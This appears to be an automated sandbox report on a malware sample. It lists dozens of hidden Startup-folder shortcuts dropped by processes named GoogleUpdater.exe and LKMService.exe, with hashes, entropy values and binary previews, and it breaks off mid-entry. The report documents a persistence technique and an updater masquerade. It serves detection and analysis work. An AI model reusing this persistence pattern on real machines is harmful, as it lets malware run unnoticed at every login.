                                                                                                                                                                                                                                          MD5:AD9BB12DFA32D8AC6F78D63027589FA2
                                                                                                                                                                                                                                          SHA1:B8998F9DA01DBD0FF2C168FFF8694D33CBD5F58B
                                                                                                                                                                                                                                          SHA-256:75CBAE372AADD35973F7A9CE50346EF4999A5144AA6D6B942902609449951FA4
                                                                                                                                                                                                                                          SHA-512:4AC6ECBC464390F0482369DC735D56868CA731E46E49144849EE61D508CA72B2B044FCFA3BF34F023B53A9D34B8267AE98971DEC418A121B8BA997A911305980
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......,K..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_25ff465526854bcdac9a181958e7ec96.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:40 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957172865634894
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8xODYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8xODYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:5EDA6459D7F5A4FF52D48CE65D1042C8
                                                                                                                                                                                                                                          SHA1:EBE785505994817863D4ADA8BD9B6AEB15C48845
                                                                                                                                                                                                                                          SHA-256:42518B2511BD6D7FA0447C1375A1FED49095B2C55010FBDF024A022C5CAA3F66
                                                                                                                                                                                                                                          SHA-512:A1E27A19AB681BB4175802DA04B3DC8D16CCE05D2B574B1F2163C4F403C254A091E3C5558DD0C295018A501ED933EEDF626BA0E0C40DF986E8738CC3CD40FD10
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......U.R..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_27cbb7ed26514b6aa95ad6d80834ca4b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:18 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.950475686610401
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8mj7cDYlXPXv+REgKWj/jiSAzav/42eEFsuqygm:8mjoDYlf2R57sevgosryg
                                                                                                                                                                                                                                          MD5:2CA98C9AF7FEA09F9BD12D952BB5D1E6
                                                                                                                                                                                                                                          SHA1:D917E95AC3B425EEC93BC933FA18EFC19FA0F994
                                                                                                                                                                                                                                          SHA-256:6B9E7E74FE6FD84086CB3F45639C6576D839975AD45B74FB89E06762723B44C0
                                                                                                                                                                                                                                          SHA-512:DB774AB814A2AE9AC62EE40AE5CA6B6FB9D2AA9F1F8A1134C4EC3C31A52CE32EC7EB5E5ED833D2B0DDE38AE607757917D5D26ED368AF43DD47B2FDCCEB0DA7C9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......q.B..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYje..Temp..:......EW<2BYje....^.....................6^..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2aa1c12a23cf42629c5248e0898582f5.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:49 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.939822502938377
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8j+7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8j+oDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:340B06D62C1EE57CCCF1FF2FFC37DAA1
                                                                                                                                                                                                                                          SHA1:65EF7FD204237606968715E95EE95FBACA2A4CF4
                                                                                                                                                                                                                                          SHA-256:23D5F51CABB65BFD6575D6932216A7955A60948DE64C4341C57C2079CB97D56E
                                                                                                                                                                                                                                          SHA-512:B94F899E89D3E2B9C4DE12C856589D6EF0C4E758C43EC6127D815CE7AB415E5939DFB99542EF50611830EFA3D7B55F9B98BA8C3625E474BB39F0B55AA743CA4B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2b713b538e1142d0893c7c62fba4dd32.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:48 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.95885290889587
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8WsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8WsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:30D664F78ABB703FF207E03250E6028E
                                                                                                                                                                                                                                          SHA1:86A7835216B2EA6C2C47CF72DDEDC23DC902F329
                                                                                                                                                                                                                                          SHA-256:B2745F0695B40E543AED2124849670B2F6DD81073EDD2A5F2BD0699D593714CC
                                                                                                                                                                                                                                          SHA-512:19CD63C2EB478544A5167C889E324278EEB1456A0776BA41799F17B2C58772FE0C4D084ADD535C41B02CE918A9F24EFD766E8B3EDB4C229D399377C640654F1F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......#...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3019ecd989774f7c91e19aadfbea9368.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:45 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.961171837769745
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:874jsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:80jsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:4BB8AC45EE82200FBA9D81D551511286
                                                                                                                                                                                                                                          SHA1:74EB6F8562A39C66AC8A66558581E2C5C8CE33CF
                                                                                                                                                                                                                                          SHA-256:6994DAA18711771DE36635802706C7B526DFD5888E79838F63AB9E1B2B4B7E81
                                                                                                                                                                                                                                          SHA-512:D0DAC8B6031766E3E3B25E4D1C441D027653B440823209F684733DA573523B5FD468DE3A14E2EA312143EA4FAA554345C121E8BACDFBDF3E3EB33AA48D02C3E6
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........|..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3028964de7754ff196fc5f65d2b4c560.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:37 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.954427810980987
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ZSDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8ZSDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:D5D48CBD26DD3AEDDCB0E723AAED3AEC
                                                                                                                                                                                                                                          SHA1:26929434CE5C4D2341C459329C5A83DCC8317F02
                                                                                                                                                                                                                                          SHA-256:5D98678F8489A5F7554696596FE053907AC26CCF43C3BAE7D44E36DBC847632B
                                                                                                                                                                                                                                          SHA-512:EB1CC9404C42CC094B379DEAE0C3591A27B6AD611AE9B4E46F26AF007525C37ACD5F60DB675BA3CA66271E845DE7B15166A42E1B958EB60811340751DF90A957
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......,...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......,..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_31e0f9699af5449dbbe1811f9f2a862a.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:57 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9475003261507045
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8z7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8zoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:12EF4CBE259B45D35A11A62EC385E483
                                                                                                                                                                                                                                          SHA1:023773C8EDF9BAEBC985F01EFA915FA9012B3287
                                                                                                                                                                                                                                          SHA-256:2EAD901F15945B6A8E226F93BD2A524D8A2BB8DD99267C86D90510251F209A23
                                                                                                                                                                                                                                          SHA-512:4D1EA3067E5933EC723491EA03DC00EA9385AC5EB882A1B5A587C46E8F7BB79C4C6EB4726863D31BCE272B9745C4DE20407C5228B077C26C6F7EEE8F659B229C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......\..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_32b39e4b230646d2923ad7debb4f6adf.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:36 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958217481705497
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:85sDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:85sDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:0D9957E2D4B5B3076C38903FF289C1A9
                                                                                                                                                                                                                                          SHA1:10D0F44AC1DAF30E9F2FFD3A24EA34770244D3DC
                                                                                                                                                                                                                                          SHA-256:BB4F9762DE08F6E1D07D99C7441B3C34AD7007EE99E03793566F11A5BE483F4D
                                                                                                                                                                                                                                          SHA-512:AF9065F628322A5051E6A4D6142E57B1ABA5BD0B77ECDD69209579D50E83118F5FB012A8FFD3698BADA586EB705C25A8DE23CC615AF96DB5CED05C45B95D63E4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......"................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_33957e70193545b19ff95d490aa522ff.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:19 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.962929381242023
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8bsDYlXPXv+RkgKF8j/jiSAzav/42eEFsuqygm:8bsDYlf2R287sevgosryg
                                                                                                                                                                                                                                          MD5:72AC0E35292EB5E086C4C20317851F74
                                                                                                                                                                                                                                          SHA1:E36E3D2B60007EFD94CCCD60575671B6DEA4BFFB
                                                                                                                                                                                                                                          SHA-256:73C97AFB80930DC330CD277223EE59A261EE49DDDCCCADD9A134066A8D196348
                                                                                                                                                                                                                                          SHA-512:D98B4744F3B149D784A30113E34E39973D489849BE7B9D5DBB265069D5360A8C40D50CC33E260DFFBD4655B8C7272E3A8AD15C79A3CB7C451E5A9BDCE83F8736
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......k...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.......................>.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_33e3c96f8f0e451abcf40414b467f00e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:43 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.927473147329743
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8g7cDYlXPXv+RIgKe9sjiSAzav/42eEFsuqygm:8goDYlf2Rhssevgosryg
                                                                                                                                                                                                                                          MD5:C5678EB12A2B301AB66EB8D388ECC5D5
                                                                                                                                                                                                                                          SHA1:0E9ECB268F581DE0B247D9B18ADB3F2AE02D6D23
                                                                                                                                                                                                                                          SHA-256:16924F0221729AA1F0847D3D2FF536A9CDA984F99765ACA0CF9F74D1437B591B
                                                                                                                                                                                                                                          SHA-512:672F29ED9CC0D260FA4E80F3C0D4F45337F2258A7D1EB46BA94D61EF195B902578997B16AAA55986D58194FCF8CC0B69A4DD40911A23892B1C12A4701C6765C4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......m7f..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe............................5.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3403f693031745c8b85a66353f3ace7e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:06 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9453754814874
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:80C7cDYlXPXv+RigKcaoj/jiSAzav/42eEFsuqygm:80CoDYlf2Reo7sevgosryg
                                                                                                                                                                                                                                          MD5:7D996B3F335B75C50867248C0070F6BD
                                                                                                                                                                                                                                          SHA1:20F42F1C25422FE06AAADE5B4DF7DEBCFD7C6525
